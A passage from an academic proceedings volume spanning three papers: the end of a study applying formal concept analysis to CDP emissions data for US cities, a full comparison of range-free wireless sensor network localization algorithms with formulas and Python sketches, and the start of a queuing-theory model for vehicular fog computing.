4. Methodology/Guidelines (Source: Carbon Disclosure Project (CDP) - Citywide-GHG-Emissions-2016): primary methodologies (column H) such as IPCC guidelines, ICF methodology, and the International Emissions Analysis Protocol (ICLEI);
5. Beneficiary of Incentive (Source: Carbon Disclosure Project (CDP) - Cities-Incentives-to-Reduce-GHG-Emissions-2015): indicators such as citizens and city employees (column G);
6. Emission Reduction Targets (Source: Carbon Disclosure Project (CDP) - Cities-Emissions-Reduction-Targets-2016): includes baseline emissions (column H), baseline year, relevant GHG sources (column G), percentage reduction target, and other details. Some cities report multiple targets.

3 Results and Discussion

As shown in Table 1, each row in the cross table is a separate object in the US data (e.g., Dallas), and each object in the cross table is associated with a number of attributes (e.g., Recognition). An "X" mark is used to display links between objects and attributes.

Table 1. Type of incentive to reduce GHG Emissions (Source: Cities-Incentives-to-Reduce-GHG-Emissions-2015). The attributes (columns) are: Monetary, Recognition, Training, Nonmonetary, Tools & Resources, Budget allocations. The objects (rows) are: Cleveland, Park City, UT, Los Angeles (C40)a, Pittsburgh, Austin (C40), Chicago (C40), Dallas, San Francisco (C40), New York City (C40); an "X" marks the incentive types reported by each city. a No data is available about Los Angeles in this part of the database.

The challenge at the first level is to find the few vital conclusions or implications. As mentioned in Sect. 2.1, FCA's association rules are used as the first layer of filtering. We determine that the implications for which


all objects favor the same attribute in the crosstab belong to the top-level "finding" group. In other words, the proportion of objects leaning towards this particular implication is 100%. Table 2 presents the conclusions of the first level. They are:
< 1 out of 1 cities > Training = [100%] ⇒ Monetary, Recognition
We can observe in Fig. 5 that "Transport" is the main emissions reduction activity in the USA.

Table 2. Type of incentive to reduce GHG Emissions (Source: Cities-Incentives-to-Reduce-GHG-Emissions-2015), USA:
– Anticipated Economic Opportunities: 4 Increased energy security ⇒(1) Development of new business industries (e.g. clean tech)
– Types of Incentives: 1 Training ⇒ Monetary, Recognition
– Emissions Reduction Activities: 6 Buildings, Mass Transit ⇒ Energy Supply, Waste
– Beneficiary of Incentive: 4 Citizens ⇒ City employees
(1) The sign connecting premise and conclusion.

It should be noted that methodologies are not included in the first level shown in Fig. 1. It is also observed that the results based on FCA's association rules not only show some of the similarities between the regions we studied, but also differences that can be region dependent.

Table 3. Second Tier Conclusions or No Definite Conclusions, USA:
– Anticipated Economic Opportunities: { }(1) = [78%](2) ⇒ Increased infrastructure investment
– Types of Incentives: { } = [67%] ⇒ Recognition
– Emissions Reduction Activities: Mass Transit = [86%] ⇒ Buildings, Energy Supply, Waste
– Beneficiary of Incentive: { } = [67%] ⇒ City employees
(1) The conclusion (or implication) has an empty premise; (2) The proportion of objects derived from the approximate rule.

Table 3 presents the conclusions of the second level: the special cases (i.e., implications for which the proportion of objects is less than 100%, with or without premise(s)) and the cases without definitive conclusions (or implications).


At this level, we also observe that the methodologies/guidelines adopted for the ongoing implementation of urban sustainability development initiatives are not included. In Table 4, the findings are collated so that decision-makers and stakeholders can get a glimpse of new business rules to guide the development of urban sustainability.

Table 4. All Cases derived from FCA's Association Analyses, USA:
– Anticipated Economic Opportunities: 4 Increased energy security ⇒ Development of new business industries (e.g. clean tech); { } = [78%] ⇒ Increased infrastructure investment
– Types of Incentives: Training ⇒ Monetary, Recognition; { } = [67%] ⇒ Recognition
– Emissions Reduction Activities: 6 Buildings, Mass Transit ⇒ Energy Supply, Waste; Mass Transit = [86%] ⇒ Buildings, Energy Supply, Waste
– Methodologies & Guidelines: X(1)
– Beneficiary of Incentive: 4 Citizens ⇒ City employees; { } = [67%] ⇒ City employees
(1) No Definite Conclusions (i.e., less than 1/2 of total objects are found to support any conclusions/implications).

Figure 6 shows the methodologies/guidelines adopted by the cities. As shown in Fig. 6, the "U.S. Community Protocol for Accounting and Reporting of Greenhouse Gas Emissions (ICLEI)" is considered relevant by Cleveland, Pittsburgh and Austin (C40).

Fig. 6. Methodologies and Guidelines - 9 Cities in the USA.

Figure 7, generated from the CDP database, summarizes the CO2 emissions of the nine studied American cities. It is clear that New York is the city that emits the most CO2; its main emission sources are transportation, urban land use and energy demand in buildings.


Fig. 7. CO2 Emissions by city - 9 Cities in the USA.

4 Conclusion and Perspectives

In this paper, we present a methodology that can generate several Key Performance Indicators (KPIs) related to environmental and social issues of the cities of the future. We believe that such indicators can help decision makers to reduce CO2 emissions and build efficient sustainable development strategies, especially for the cities of the future. We have used the 2016 City Carbon Disclosure Project datasets in this work. We plan to use the CDP 2020 datasets in our future work to generate KPIs. In addition, we plan to optimize the proposed methodology for sustainable cities using green computing techniques as well as Deep Learning architectures [6].

References
1. Carbon Disclosure Project, 2016 datasets. City files, CDP public data. https://data.cdp.net/. Accessed 30 Mar 2022
2. FCA software Concept Explorer. http://conexp.sourceforge.net/. Accessed 30 Mar 2022
3. Lopes, N.V.: Smart governance: a key factor for smart cities implementation. In: 2017 IEEE International Conference on Smart Grid and Smart Cities (ICSGSC), pp. 277–282 (2017). https://doi.org/10.1109/ICSGSC.2017.8038591
4. Madu, C.N., Kuei, C.-H., Lee, P.: Urban sustainability management: a deep learning perspective. Sustainable Cities Soc. 30, 1–17 (2017)


5. Nosratabadi, S., Mosavi, A., Keivani, R., Ardabili, S., Aram, F.: State of the art survey of deep learning and machine learning models for smart cities and urban sustainability. In: Várkonyi-Kóczy, A.R. (ed.) INTER-ACADEMIA 2019. LNNS, vol. 101, pp. 228–238. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-36841-8_22
6. Rhoads, D., Solé-Ribalta, A., González, M.C., Borge-Holthoefer, J.: Planning for sustainable open streets in pandemic cities. arXiv: Physics and Society (2020)
7. Wille, R.: Restructuring lattice theory: an approach based on hierarchies of concepts. In: Ordered Sets, pp. 445–470. Springer, Netherlands (1982)

Performance Comparison of Localization Techniques in Term of Accuracy in Wireless Sensor Networks Omar Arroub1(B) , Anouar Darif2 , Rachid Saadane3 , and Moly Driss Rahmani1 1 LRIT-GSCM Associated Unit to CNRST (URAC 29), FSR Mohammed V-Agdal University,

BP 1014, Rabat, Morocco [email protected] 2 LIMATI, University of Sultan Moulay Slimane Faculte Polydisciplinaire, Beni-Mellal, Morocco 3 SIRC/LAGES-EHTP, Hassania School of Public Labors, Km 7 El Jadida Road, B.P 8108, Casa-Oasis, Morocco [email protected]

Abstract. Localization is an important part of Wireless Sensor Networks (WSNs): without location information, messages may be missed. There are many algorithms to localize a node in a WSN; however, the number of anchors influences the accuracy of the localization. In this paper, we first explore various localization techniques, then compare their performance in terms of accuracy, and demonstrate that increasing the number of anchors influences the accuracy of each localization technique. Keywords: WSN · Localization · Centroid · APIT · DVHOP

1 Introduction
Wireless Sensor Networks (WSNs) distinguish themselves from other traditional wireless or wired networks through sensor- and actuator-based interaction with the environment. Such networks have been proposed for various applications including search, rescue, disaster relief, target tracking, and smart environments. Localization is the process of determining the position of an unknown node based on the known node positions by some mechanism or logic integrated in the algorithm, and it is vital to many applications, such as battlefield surveillance [1], environmental monitoring [2] and target tracking [3]. Furthermore, many routing protocols are based on the assumption that the geographic parameters of the sensor nodes are available. Although many existing positioning systems and algorithms can solve the WSN positioning issues, there are still some problems: the unknown-position node must be located directly, which results in an increase of the anchor node density.


This paper makes three major contributions to the localization problem in WSNs. First, we explore a variety of range-free algorithms. Second, we compare their performance in terms of accuracy under realistic system configurations; we perform such a study to serve as a guide for future research. Third, we demonstrate that APIT performs better when the number of anchors is high and random node placement is considered. The rest of the paper is organized as follows: in Sect. 2 we present wireless sensor networks; in Sect. 3 we present the details of the localization algorithms; the simulation and its results are presented in Sect. 4; finally, Sect. 5 concludes the paper.

2 Wireless Sensor Network (WSN)
Wireless sensor networks (WSNs) are considered and used in a wide range of applications, such as military sensing, data broadcasting [4], environmental monitoring [5], intelligent vehicular systems [6], multimedia [7], patient monitoring [8], agriculture [8], industrial automation [9] and audio [10]. WSNs have not yet achieved widespread deployment, even though they have proven capable of meeting the requirements of many application categories. A WSN has some limitations, such as low computing power, small storage devices, narrow network bandwidth and very low battery power. The sensor nodes are usually scattered in a sensor field as shown in Fig. 1. Each of these scattered sensor nodes has the capability to collect data and route it back to the sink and the end users. These data are routed back to the end user by a multi-hop infrastructure through the sink. The sink may communicate with the task manager node via Internet or satellite.

Fig. 1. Sensor nodes scattered in a sensor field

3 Localization Algorithm
In WSNs, there are two main categories of localization algorithms:
• The range-based technique
• The range-free technique


3.1 Range-Based Technique
This technique realizes self-localization of an unknown node by computing the distance or direction between the unknown node and nearby anchor nodes, as in the received signal strength indication (RSSI) algorithm [11], the time of arrival (TOA) algorithm [12], the time difference of arrival (TDOA) algorithm [13], and so forth [14]. This class gives very accurate location results, but it is generally very energy-consuming; furthermore, additional hardware is usually required, which also increases the overall cost of WSNs.

3.2 Range-Free Technique
This technique utilizes the connectivity of WSNs to obtain the location information of an unknown node, as in the Centroid localization algorithm [15], the APIT algorithm, DV-Hop [16], and Amorphous.

3.2.1 Centroid Algorithm
In this method the unknown sensor node localizes itself by calculating the centroid of the positions of all the adjacent connected anchor nodes. The Centroid algorithm differs from trilateration as it is a range-free algorithm; range-free algorithms do not depend entirely on RSSI distance measurements for localization. In this algorithm, a node receives signals from all anchor nodes that are in range. The node is then localized to the center of gravity of the intersection of the circles formed by the propagation model of each anchor node. This is done by simply averaging the x and y coordinates. The node uses the anchors containing location information (Xi, Yi) to estimate its position. After receiving these anchors, a node estimates its location using the following centroid formula [17]:

$(X_{est}, Y_{est}) = \left(\frac{X_1 + \dots + X_N}{N}, \frac{Y_1 + \dots + Y_N}{N}\right)$  (1)

The advantages of the centroid algorithm are its low complexity, cost-effectiveness and ease of implementation; its disadvantage is the large amount of error it can produce. The pseudocode of the Centroid algorithm is sketched below.
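A minimal Python sketch of the centroid estimate of Eq. (1), assuming each anchor heard by the node is given as an (x, y) coordinate pair; the function name and the example coordinates are illustrative:

```python
def centroid_localize(anchors):
    """Range-free centroid estimate of Eq. (1): average the coordinates
    of all anchors heard by the unknown node."""
    n = len(anchors)
    x_est = sum(x for x, _ in anchors) / n
    y_est = sum(y for _, y in anchors) / n
    return x_est, y_est

# Three anchors heard by the unknown node (hypothetical coordinates).
print(centroid_localize([(0.0, 0.0), (10.0, 0.0), (5.0, 8.0)]))  # (5.0, 2.66...)
```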


3.2.2 APIT Localization Algorithm
In this section, we describe our novel area-based range-free localization scheme, which we call APIT. APIT requires a heterogeneous network of sensing devices where a small percentage of these devices (percentages vary depending on network and node density) are equipped with high-powered transmitters and location information obtained via GPS or some other mechanism. We refer to these location-equipped devices as anchors. Using beacons from these anchors, APIT employs a novel area-based approach to perform location estimation by isolating the environment into triangular regions between beaconing nodes (Fig. 2).

Fig. 2. Area-based APIT algorithm overview

The procedures of APIT consist mainly of four steps, as follows:
• Beaconing phase: nodes collect the information about those anchor nodes that can communicate with them, according to the information broadcast by the anchor nodes.
• PIT (Point-In-Triangulation) test execution phase: after the first phase, every unknown node has collected all the information about the anchor nodes; the unknown node then checks every combination of three of them and tests whether it lies inside the triangle formed by the three anchor nodes.


• Grid scanning phase: if the unknown node is inside the triangle formed by the three anchor nodes, the count of the grid cells inside the triangle is increased by 1.
• Centroid calculation phase: after the above three steps, we find the grid cells with the maximum count and calculate the centroid of the polygon composed of these grid cells.

APIT Aggregation. Once the individual APIT tests finish, APIT aggregates the results (inside/outside decisions, among which some may be incorrect) through a grid SCAN algorithm (Fig. 3). In this algorithm, a grid array is used to represent the maximum area in which a node will likely reside. The basic idea of the grid SCAN algorithm is to divide the entire network into grid cells of a certain step size and to use the APIT test to determine the relationship between the unknown node and the triangles. If the unknown node is inside a triangle, the value of all the grid cells in that triangle is increased by 1; if the unknown node is outside the triangle, the value of all the grid cells in the triangle is decreased by 1. After traversing all the triangles, the area with the maximum value is the area where the node is most likely to be. As shown in Fig. 3, the black triangle is the unknown node, and the shaded area is the largest polygon area where the node is most likely to appear.
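A minimal Python sketch of this grid SCAN aggregation, assuming the terrain is a rectangle anchored at the origin; the function names, the cell-center test and the point-in-triangle helper are illustrative choices, not the authors' implementation:

```python
import numpy as np

def _side(p, a, b):
    """Signed area test: on which side of segment (a, b) does point p lie."""
    return (p[0] - b[0]) * (a[1] - b[1]) - (a[0] - b[0]) * (p[1] - b[1])

def in_triangle(p, tri):
    """True if point p lies inside (or on the border of) triangle tri."""
    a, b, c = tri
    d1, d2, d3 = _side(p, a, b), _side(p, b, c), _side(p, c, a)
    has_neg = d1 < 0 or d2 < 0 or d3 < 0
    has_pos = d1 > 0 or d2 > 0 or d3 > 0
    return not (has_neg and has_pos)

def grid_scan(width, height, step, triangles, inside_flags):
    """Grid SCAN aggregation: +1 on every cell of a triangle the node was judged
    inside, -1 on every cell of a triangle it was judged outside. The cells with
    the maximum value form the area where the node most likely resides."""
    xs, ys = np.arange(0, width, step), np.arange(0, height, step)
    grid = np.zeros((len(xs), len(ys)))
    for tri, inside in zip(triangles, inside_flags):
        delta = 1 if inside else -1
        for i, x in enumerate(xs):
            for j, y in enumerate(ys):
                if in_triangle((x + step / 2, y + step / 2), tri):
                    grid[i, j] += delta
    return grid
```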


Fig. 3. Scan approach

3.2.3 DV-Hop Algorithm
The three steps of the DV-Hop algorithm are discussed as follows.
Step 1: Flooding. In this step, all anchor nodes broadcast data packets with their locations to their neighbors, and the hop-count fields are initially set to zero. The structure of the data packet is {id, xi, yi, hi}, including the identifier id, the coordinates (xi, yi) of anchor node i, and hi, the minimum hop-count value from anchor node i, whose initial value is zero. Once a neighbor node receives a packet with a smaller hop-count value from a particular anchor node, the location of that anchor node is recorded and '1' is added to the hop-count value before the packet is sent to other neighbor nodes [18–23]. Packets with higher hop-count values are treated as obsolete information and are ignored. As soon as this


step is completed, each of the unknown nodes in the network has retrieved the minimum hop-count value for each anchor node.

Step 2: Distance Estimation between Nodes. In this step, the distance between nodes is estimated. First, the average distance per hop of each anchor node is calculated. For anchor node i, Eq. (2) gives the average distance per hop:

$HopSize_i = \frac{\sum_{i \neq j} d_{i,j}}{\sum_{i \neq j} h_{i,j}}$  (2)

where $d_{i,j} = \sqrt{(x_i - x_j)^2 + (y_i - y_j)^2}$, (xi, yi) and (xj, yj) represent the locations of anchor nodes i and j, and hi,j represents the minimum hop-count value between anchor nodes i and j. After calculating HopSizei, each anchor node broadcasts its HopSizei through the network by controlled flooding. Equation (3) is then used to determine the estimated distance between the unknown node u and anchor node i:

$d_{u,i} = HopSize_i \cdot h_{u,i}$  (3)

where hu,i represents the minimum hop-count value between anchor node i and unknown node u.

Step 3: Estimate the Location of Nodes. In step 3, the locations of all unknown nodes must be found. For the unknown node u, the multilateration method [24] is used to estimate its location. Let (xu, yu) be the location of the unknown node u and (xi, yi) the location of anchor node i, where i = 1, 2, ..., m. The distances between the unknown node u and the m anchor nodes are then specified by the following system:

$\begin{cases} (x_1 - x_u)^2 + (y_1 - y_u)^2 = d_1^2 \\ (x_2 - x_u)^2 + (y_2 - y_u)^2 = d_2^2 \\ \ldots \\ (x_m - x_u)^2 + (y_m - y_u)^2 = d_m^2 \end{cases}$  (4)

Equation (4) can be expanded, by subtracting the last equation from the others, to:

$\begin{cases} x_1^2 - x_m^2 - 2(x_1 - x_m)x_u + y_1^2 - y_m^2 - 2(y_1 - y_m)y_u = d_1^2 - d_m^2 \\ x_2^2 - x_m^2 - 2(x_2 - x_m)x_u + y_2^2 - y_m^2 - 2(y_2 - y_m)y_u = d_2^2 - d_m^2 \\ \ldots \\ x_{m-1}^2 - x_m^2 - 2(x_{m-1} - x_m)x_u + y_{m-1}^2 - y_m^2 - 2(y_{m-1} - y_m)y_u = d_{m-1}^2 - d_m^2 \end{cases}$  (5)


The above Eq. (5) can be expressed in matrix form as $AX = B$, where A, X and B are given by Eqs. (6)–(8), respectively:

$A = \begin{bmatrix} 2(x_1 - x_m) & 2(y_1 - y_m) \\ 2(x_2 - x_m) & 2(y_2 - y_m) \\ \ldots & \ldots \\ 2(x_{m-1} - x_m) & 2(y_{m-1} - y_m) \end{bmatrix}$  (6)

$B = \begin{bmatrix} x_1^2 - x_m^2 + y_1^2 - y_m^2 + d_m^2 - d_1^2 \\ x_2^2 - x_m^2 + y_2^2 - y_m^2 + d_m^2 - d_2^2 \\ \ldots \\ x_{m-1}^2 - x_m^2 + y_{m-1}^2 - y_m^2 + d_m^2 - d_{m-1}^2 \end{bmatrix}$  (7)

$X = \begin{bmatrix} x_u \\ y_u \end{bmatrix}$  (8)

The least squares method is used to solve the system, and the coordinates of the unknown node u are calculated as:

$X = (A^T A)^{-1} A^T B$  (9)

3.2.4 Amorphous Localization
Radhika Nagpal proposed the Amorphous algorithm [25]. Unlike DV-Hop, it assumes that the average local connectivity of the network, nlocal, is known and uses Eq. (10) to compute the network average hop distance, where r is the communication radius. The estimated average distance per hop multiplied by the minimum hop count gives the distance to each anchor; an unknown node needs to work out at least three such distances and then uses maximum likelihood estimation or trilateration to estimate its position.

$HopSize = r\left(1 + e^{-n_{local}} - \int_{-1}^{1} e^{-\frac{n_{local}}{\pi}\left(\arccos t - t\sqrt{1 - t^2}\right)} dt\right)$  (10)

In essence, the Amorphous algorithm is an enhanced version of the DV-Hop algorithm: it applies a gradient correction method to the per-hop distance calculation and introduces a refinement of the estimate using a number of anchor nodes. The algorithm needs to predict the average connectivity of the network and requires high node densities.
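Returning to the third step of DV-Hop, a minimal Python sketch of the least-squares multilateration of Eqs. (6)–(9); for simplicity it assumes a single average hop size rather than one HopSize value per anchor, and the function name and example values are illustrative:

```python
import numpy as np

def dvhop_estimate(anchors, hops, hop_size):
    """DV-Hop step 3: least-squares multilateration (Eqs. (6)-(9)).
    anchors  : (m, 2) array of anchor coordinates (x_i, y_i)
    hops     : (m,) minimum hop counts h_{u,i} from the unknown node to each anchor
    hop_size : average distance per hop (a single value here, for simplicity)"""
    anchors = np.asarray(anchors, dtype=float)
    d = hop_size * np.asarray(hops, dtype=float)                 # Eq. (3)
    xm, ym, dm = anchors[-1, 0], anchors[-1, 1], d[-1]
    A = 2.0 * (anchors[:-1] - anchors[-1])                       # Eq. (6)
    B = (anchors[:-1, 0]**2 - xm**2 + anchors[:-1, 1]**2 - ym**2
         + dm**2 - d[:-1]**2)                                    # Eq. (7)
    x_u, y_u = np.linalg.lstsq(A, B, rcond=None)[0]              # Eq. (9)
    return x_u, y_u

# Hypothetical example: three anchors, hop counts and an average hop size.
print(dvhop_estimate([(0, 0), (100, 0), (0, 100)], hops=[3, 4, 4], hop_size=20.0))
```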

4 Simulation and Results This section describes the simulation settings we use in our evaluation.


4.1 Placement Model
In our simulations, nodes and anchors are distributed in a rectangular terrain in accordance with predefined densities. Two placement strategies are considered, namely random and uniform. 1) Random placement: all nodes and anchors are distributed randomly throughout the terrain. 2) Uniform placement: the terrain is partitioned into grids, and nodes and anchors are evenly divided amongst these grids (random distribution inside each grid).

4.2 System Parameters
In our experiments we study a network with:
• number of nodes: 300 nodes
• mobility of nodes: static
• placement: random and uniform node/anchor placements are investigated in the evaluation.

4.3 Results
This section provides a detailed quantitative analysis comparing the performance of the localization algorithms. The obvious metric for comparison when evaluating localization schemes is the location estimation error. We run two experiments, in the uniform and random placements, while varying the number of anchors. We analyze the effect of varying the number of anchors heard (AH) at a node on the localization error. Figure 4 shows that the estimation error decreases as the number of anchors heard increases. However, it is important to note that different algorithms transition at different points in the graph. For example, the Amorphous and DV-Hop schemes improve rapidly when AH is below 7 and are insensitive to the addition of anchors above 7. In contrast, the precision of APIT and of the Centroid localization scheme constantly improves as AH is increased (Fig. 5). Our APIT algorithm performs worse than the Centroid algorithm when AH is below 8, due to the fact that the diameter of the divided area is not small enough; this effect is significantly reduced by increasing AH values. For larger AH values, APIT consistently outperforms the Centroid scheme. Figure 5 extends AH to higher values and shows that APIT needs about 12 anchors to reach the 0.6R estimation error level, while the Centroid scheme requires 24. Finally, we note that the APIT scheme performs best when random node placement is considered.
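The location estimation error reported in Figs. 4 and 5 is normalized by the radio range R (hence values such as 0.6R). A minimal sketch of such a metric; the function name and inputs are illustrative assumptions, not the authors' exact evaluation code:

```python
import numpy as np

def mean_normalized_error(estimates, truths, radio_range):
    """Mean localization error normalized by the radio range R
    (the unit behind values such as 0.6R in the results)."""
    estimates = np.asarray(estimates, dtype=float)
    truths = np.asarray(truths, dtype=float)
    errors = np.linalg.norm(estimates - truths, axis=1)
    return errors.mean() / radio_range

# Two estimated positions against their true positions (hypothetical values).
print(mean_normalized_error([(36, 36), (50, 52)], [(30, 30), (55, 50)], radio_range=25.0))
```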


Fig. 4. Localization error when varying the number of anchors in random deployment

Fig. 5. Localization error when varying the number of anchors in uniform deployment


5 Conclusion and Future Works
In this paper, the Centroid algorithm was presented, in which the unknown sensor node localizes itself by calculating the centroid of the positions of all the adjacent connected anchor nodes; this algorithm is easy to implement but produces a large amount of error. The DV-Hop algorithm is based on the minimum hop count from the anchor nodes to the unknown node; it estimates the node's position through a triangulation algorithm or maximum likelihood estimation, and it can reach good location accuracy only in a uniformly distributed and dense sensor network environment. The Amorphous algorithm improves on DV-Hop, but its formula for the network average hop distance is different from that of DV-Hop; it is easy to implement but requires high node densities. Finally, we find that APIT has the best performance, especially with random node placement. However, the GRID SCAN method introduces plenty of redundancy errors, especially when applied in underwater fields where, with the effect of noise and interference, this has an enormous impact on the accuracy of the localization. In order to consolidate the theoretical results cited previously, we suggest conducting an experiment with the APIT method in a pool, aiming at solving the redundancy that occurs in the traditional APIT algorithm.

References 1. Wang, Z., Wang, X., Liu, L., Huang, M., Zhang, Y.: Decentralized feedback control for wireless sensor and actuator networks with multiple controllers. Int. J. Mach. Learn. Cybern. 8(5), 1471–1483 (2016). https://doi.org/10.1007/s13042-016-0518-y 2. Bhatti, G.: Machine learning based localization in large-scale wireless sensor networks. Sensors 18, 4179 (2018) 3. Wang, J., Ghosh, R.K., Das, S.K.: A survey on sensor localization. J. Control Theory Appl. 8, 2–11 (2010) 4. Liang, W., Tang, M., Long, J., Peng, X., Xu, J., Li, K.-C.: A secure fabric blockchain-based data transmission technique for industrial internet-of-things. IEEE Trans. Ind. Inform. 15, 3582–3592 (2019) 5. Romer, K., Mattern, F.: The design space of wireless sensor networks. IEEE Wirel. Commun. 11, 54–61 (2004) 6. Liang, W., Li, K.-C., Long, J., Kui, X., Zomaya, A.Y.: An industrial network intrusion detection algorithm based on multi-feature data clustering optimization model. IEEE Trans. Ind. Inform. 16, 2063–2071 (2019) 7. Cui, M., Han, D., Wan, J.: An efficient and safe road condition monitoring authentication scheme based on fog computing. IEEE Internet Things J. 6, 9076–9084 (2019) 8. Liang, W., Long, J., Weng, T.-H., Chen, X., Li, K.-C., Zomaya, A.Y.: TBRS: a trust based recommendation scheme for vehicular CPS network. Future Gener. Comput. Syst. 92, 383– 398 (2019) 9. Zhao, W., Su, S., Shao, F.: Improved DV-hop algorithm using locally weighted linear regression in anisotropic wireless sensor networks. Wirel. Pers. Commun. 98, 3335–3353 (2018) 10. Peng, B., Li, L.: An improved localization algorithm based on genetic algorithm in wireless sensor networks. Cogn. Neurodyn. 9(2), 249–256 (2015). https://doi.org/10.1007/s11571014-9324-y


11. Harikrishnan, R., Kumar, V.J.S., Ponmalar, P.S.: Differential evolution approach for localization in wireless sensor networks. In: Proceedings of the IEEE International Conference on Computational Intelligence and Computing Research, Coimbatore, India, 18–20 December 2014, pp. 1–4 (2014) 12. Storn, R., Price, K.: Differential evolution–a simple and efficient heuristic for global optimization over continuous spaces. J. Glob. Optim. 11, 341–359 (1997) 13. Sarker, R.A., Elsayed, S.M., Ray, T.: Differential evolution with dynamic parameters selection for optimization problems. IEEE Trans. Evol. Comput. 18, 689–707 (2013) 14. Xie, P., You, K., Song, S., Wu, C.: Distributed range-free localization via hierarchical nonconvex constrained optimization. Signal Process. 164, 136–145 (2019) 15. Bachrach, J., Nagpal, R., Salib, M., Shrobe, H.: Experimental results for and theoretical analysis of a self-organizing global coordinate system for ad hoc sensor networks. Telecommun. Syst. 26, 213–233 (2004) 16. He, T., Huang, C., Blum, B.M., Stankovic, J.A., Abdelzaher, T.: Range-free localization schemes for large scale sensor networks. In: Proceedings of the 9th Annual International Conference on Mobile Computing and Networking, San Diego, CA, USA, 14–19 September 2003, pp. 81–95 (2003) 17. Zhang, S., Liu, X., Wang, J., Cao, J., Min, G.: Accurate range-free localization for anisotropic wireless sensor networks. ACM Trans. Sens. Netw. 11, 51 (2015) 18. Manickam, M., Selvaraj, S.: Range-based localisation of a wireless sensor network using Jaya algorithm. IET Sci. Meas. Technol. (2019) 19. Wei, H., Wan, Q., Chen, Z., Ye, S.: A novel weighted multidimensional scaling analysis for time-of-arrival-based mobile location. IEEE Trans. Signal Process. 56, 3018–3022 (2008) 20. Xiao, J., Ren, L., Tan, J.: Research of TDOA based self-localization approach in wireless sensor network. In: Proceedings of the IEEE/RSJ International Conference on Intelligent Robots and Systems, Beijing, China, 9–15 October 2006, pp. 2035–2040 (2006) 21. Niculescu, D., Nath, B.: Ad hoc positioning system (APS) using AOA. In: Proceedings of the IEEE INFOCOM 2003. Twenty-second Annual Joint Conference of the IEEE Computer and Communications Societies (IEEE Cat. No. 03CH37428), San Francisco, CA, USA, 30 March–3 April 2003, pp. 1734–1743 (2003) 22. Xie, H., Li, W., Li, S., Xu, B.: An improved DV-hop localization algorithm based on RSSI auxiliary ranging. In: Proceedings of the 35th Chinese Control Conference (CCC), Chengdu, China, 27–29 July 2016, pp. 8319–8324 (2016) 23. Kulkarni, V.R., Desai, V., Kulkarni, R.V.: A comparative investigation of deterministic and metaheuristic algorithms for node localization in wireless sensor networks. Wirel. Netw. 25(5), 2789–2803 (2019). https://doi.org/10.1007/s11276-019-01994-9 24. Capkun, S., Hamdi, M., Hubaux, J.: GPS-free positioning in mobile ad hoc networks. Clust. Comput. 5, 157–167 (2002) 25. Niculescu, D., Nath, B.: DV based positioning in ad hoc networks. Telecommun. Syst. 22, 267–280 (2003)

Fog Computing Model Based on Queuing Theory Hibat Eallah Mohtadi(B) , Mohamed Hanini, and Abdelkrim Haqiq Faculty of Sciences and Techniques, Computer, Networks, Mobility and Modeling Laboratory: IR2M, Hassan First University of Settat, 26000 Settat, Morocco {h.mohtadi,abdelkrim.haqiq}@uhp.ac.ma

Abstract. To overcome the limitations of the Cloud, which does not fit well for vehicles needing high-speed processing, low latency and more security, fog computing has evolved, extending the functionality of the cloud computing model to the edge of the network. In this context, the idea of utilizing vehicles as infrastructure, named Vehicular Fog Computing (VFC), has been proposed. VFC is an architecture that utilizes a collaborative multitude of end-user clients or near-user edge devices to carry out communication and computation, based on a better utilization of the individual communication and computational resources of each vehicle. In this work, we determine the QoS performance in different scenarios. We give a mathematical model by formulating the vehicular fog computing system using queuing theory, in order to evaluate QoS parameters such as the mean throughput, the mean number of requests and the service utilisation; we then use the analytical results to study the effect of mobility on fog computing. We consider the service time in our mathematical model to be the key factor of mobility: each vehicle has its own service time, so when vehicles move, the service time changes.

Keywords: Internet of Things · Fog computing · Vehicular fog computing · queuing theory

1 Introduction

Vehicles can be used as an infrastructure for computing, forming what is called Vehicular Cloud Computing (VCC) [1]. Recently, IoT (Internet of Things) applications have seen considerable growth, which raises serious challenges for classic cloud computing, for instance the increasing demand for real-time processing and the high latency due to the immense amount of data generated by IoT devices [4]. Consequently, fog computing has been introduced by CISCO to enable applications on the billions of connected devices of the Internet of Things to run directly at the network edge; moreover, fog computing brings cloud networking, computing and storage capacities down to the edge


of the network [10]. Fog computing improves confidentiality and response rate, and has been shown to decrease the usage of the Internet connection in many smart-environment applications [3]. In order to benefit from the underutilized resources of vehicles, Vehicular Fog Computing (VFC) has been introduced by [2] to make use of the computation, communication and storage capacities of vehicles in the fog environment. The VFC network is composed of fog nodes and vehicles for local decision making [6]. In fact, VFC has a lot of advantages, such as low latency and high mobility support, and it ensures a large number of fog nodes distributed in the proximity of users [7]. In other words, fog computing in the vehicular context is beneficial in terms of bandwidth (BW) and is also a good approach for low-latency applications [11]. VFC has lately received a lot of interest because of the near vicinity of computational resources to the network edge or the end devices, especially by using vehicles as fog nodes, which increases the fog resources and gives the chance to perform local processing and storage in vehicles [5]. In this paper, we adopt an architecture for VFC to optimally schedule task offloading and resource allocation. In order to study the effect of mobility on the service QoS in this architecture, we propose a model based on queuing theory and we measure different performance metrics in the fog layer. The motivation behind using queuing theory is that queuing models improve data transmission stability and service utilisation reliability [8]. Our main aim is to study the impact of mobility on the QoS parameters of our system, and in particular on the mean service rate of the mobile fog (the moving vehicle), which is expected to be unsteady due to mobility. In other words, one of the main parameters affected by mobility is the mean service rate, which depends on each vehicle playing the role of a fog node; we therefore have varied mean service rates depending on the quality of the vehicle. The remainder of this paper is organized as follows: Sect. 2 describes the architecture of Vehicular Fog Computing; Sect. 3 exposes the model description in detail; Sect. 4 introduces the analytical model and gives the performance parameters; Sect. 5 evaluates and discusses the numerical results; finally, Sect. 6 concludes the paper and outlines some future directions to explore.

2 Vehicular Fog Computing Architecture

The aim of fog computing is to reduce latency by providing a virtual platform near the user edge devices that ensures computing, storage and processing. In the context of VFC we consider three tiers [9]. The first tier is the IoT devices layer, composed of different IoT devices, such as smart vehicles, smart phones and sensors, that exist everywhere. They are responsible for generating and transmitting traffic data, workloads and applications, and for communicating them either to the cloud or to the fog to be processed. The second tier, which lies between the IoT devices and the cloud, is the fog. It includes any device that can provide storage, computing and network connectivity; furthermore, it is composed of two kinds of nodes: mobile fogs, such as


moving vehicles, and stationary or static fogs, such as RSUs and WiFi access points. This layer is in charge of preprocessing the collected data and temporarily storing the received data. The FC (Fog Computing) layer is able to perform real-time analysis and run latency-sensitive applications. The third tier is the cloud computing layer, which has huge computing and storage capacity guaranteed by the DCs (Data Centers) that support the analysis, processing and storage of the great amount of data. Figure 1 shows the three-tier architecture we have described.

Fig. 1. The system architecture of vehicular fog computing.

3 Model Description

